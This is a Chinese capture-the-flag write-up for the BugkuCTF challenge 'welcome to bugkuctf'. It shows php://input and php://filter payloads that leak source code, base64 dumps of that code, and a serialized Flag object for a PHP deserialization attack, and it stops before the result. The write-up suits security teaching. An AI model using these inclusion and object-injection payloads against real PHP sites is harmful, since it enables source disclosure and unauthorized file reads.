CTF/CTF练习平台-welcome to bugkuctf【php://filter及php://input】

原题内容：

http://120.24.86.145:8006/test1/

 

首先bp一下，可见提示源码：

 

首先，分析代码获取四个需求：

 

1.三个传参

2.$user存在且不为空，

3.读取$user文件，内容为welcome to the bugkuctf，

4.$file要求为hint.php，将其导入

 

其实比较熟悉就知道两个点可以利用了，php://input与php://filter

php不提了，之前的博客中讲解过，不懂得可以前去看一下

CTF/CTF练习平台-flag在index里【php://filter的利用】

这里讲一下php://input

当传进去的参数作为文件名变量去打开文件时，可以将参数php://传进，同时post方式传进去值作为文件内容，供php代码执行时当做文件内容读取

这题的效果如下：

加上php://filter的利用，读取hint.php的内容

load url改为：

 

http://120.24.86.145:8006/test1/index.php?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=

可得到base64加密的字符串：

 

 

PD9waHAgIA0KICANCmNsYXNzIEZsYWd7Ly9mbGFnLnBocCAgDQogICAgcHVibGljICRmaWxlOyAgDQogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9zdHJpbmcoKXsgIA0KICAgICAgICBpZihpc3NldCgkdGhpcy0+ZmlsZSkpeyAgDQogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgDQoJCQllY2hvICI8YnI+IjsNCgkJcmV0dXJuICgiZ29vZCIpOw0KICAgICAgICB9ICANCiAgICB9ICANCn0gIA0KPz4gIA==

同理把hint.php改为index.php，顺路看看index的源码：

 

得到字符串：

 

PD9waHAgIA0KJHR4dCA9ICRfR0VUWyJ0eHQiXTsgIA0KJGZpbGUgPSAkX0dFVFsiZmlsZSJdOyAgDQokcGFzc3dvcmQgPSAkX0dFVFsicGFzc3dvcmQiXTsgIA0KICANCmlmKGlzc2V0KCR0eHQpJiYoZmlsZV9nZXRfY29udGVudHMoJHR4dCwncicpPT09IndlbGNvbWUgdG8gdGhlIGJ1Z2t1Y3RmIikpeyAgDQogICAgZWNobyAiaGVsbG8gZnJpZW5kITxicj4iOyAgDQogICAgaWYocHJlZ19tYXRjaCgiL2ZsYWcvIiwkZmlsZSkpeyANCgkJZWNobyAi5LiN6IO9546w5Zyo5bCx57uZ5L2gZmxhZ+WTpiI7DQogICAgICAgIGV4aXQoKTsgIA0KICAgIH1lbHNleyAgDQogICAgICAgIGluY2x1ZGUoJGZpbGUpOyAgIA0KICAgICAgICAkcGFzc3dvcmQgPSB1bnNlcmlhbGl6ZSgkcGFzc3dvcmQpOyAgDQogICAgICAgIGVjaG8gJHBhc3N3b3JkOyAgDQogICAgfSAgDQp9ZWxzZXsgIA0KICAgIGVjaG8gInlvdSBhcmUgbm90IHRoZSBudW1iZXIgb2YgYnVna3UgISAiOyAgDQp9ICANCiAgDQo/PiAgDQogIA0KPCEtLSAgDQokdXNlciA9ICRfR0VUWyJ0eHQiXTsgIA0KJGZpbGUgPSAkX0dFVFsiZmlsZSJdOyAgDQokcGFzcyA9ICRfR0VUWyJwYXNzd29yZCJdOyAgDQogIA0KaWYoaXNzZXQoJHVzZXIpJiYoZmlsZV9nZXRfY29udGVudHMoJHVzZXIsJ3InKT09PSJ3ZWxjb21lIHRvIHRoZSBidWdrdWN0ZiIpKXsgIA0KICAgIGVjaG8gImhlbGxvIGFkbWluITxicj4iOyAgDQogICAgaW5jbHVkZSgkZmlsZSk7IC8vaGludC5waHAgIA0KfWVsc2V7ICANCiAgICBlY2hvICJ5b3UgYXJlIG5vdCBhZG1pbiAhICI7ICANCn0gIA0KIC0tPiAg

 

 

 

解密得到代码：

#hint.php

file)){  
            echo file_get_contents($this->file); 
            echo "
";
        return ("good");
        }  
    }  
}  
?>  

#index.php
";  
    if(preg_match("/flag/",$file)){ 
        echo "不能现在就给你flag哦";
        exit();  
    }else{  
        include($file);   
        $password = unserialize($password);  
        echo $password;  
    }  
}else{  
    echo "you are not the number of bugku ! ";  
}  
  
?>  
  
  

 

从上面获取的源码可得到如下信息：

1.提示hint.php中提示flag.php,从index.php可以看到对关键词flag进行了屏蔽

2.hint.php中定义了一个类Flag，很有意思的是中间有个 __tostring 方法，这个方法可以理解为将这个类作为字符串执行时会自动执行的一个函数

3. __tostring 方法执行时，将变量$file作为文件名输出文件内容，结合提示flag.php，猜测屏蔽的flag.php文件在此打开

4.在index.php源码中看到了$password的作用

 

这里走进了一个坑，一直在想办法绕过flag关键词的屏蔽，但是限制于php://fliter的格式，一直不得其解

 

正解应该是利用$password

之前说过Flag方法当做字符串执行时，会自动执行 __tostring 方法，注意到echo函数，只能输出一个或多个字符串，所以只要$password为Flag类型数据，且其中string类型的变量$file为flag.php即可

理解到这里，就懂了为啥多一个很奇怪的unserialize函数，其作用即为让你用字符串方式传递一个类

具体函数用法不多说，以前博客中有讲过，不懂可以去一看

实验吧-天网管理系统【php弱类型==与===的利用】

 

自己写了个php文件：

 

file = "flag.php";
    $a = serialize($a);
	print_r($a);
?>

执行得到O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

 

 

将其作为参数$password传进去，bp可得：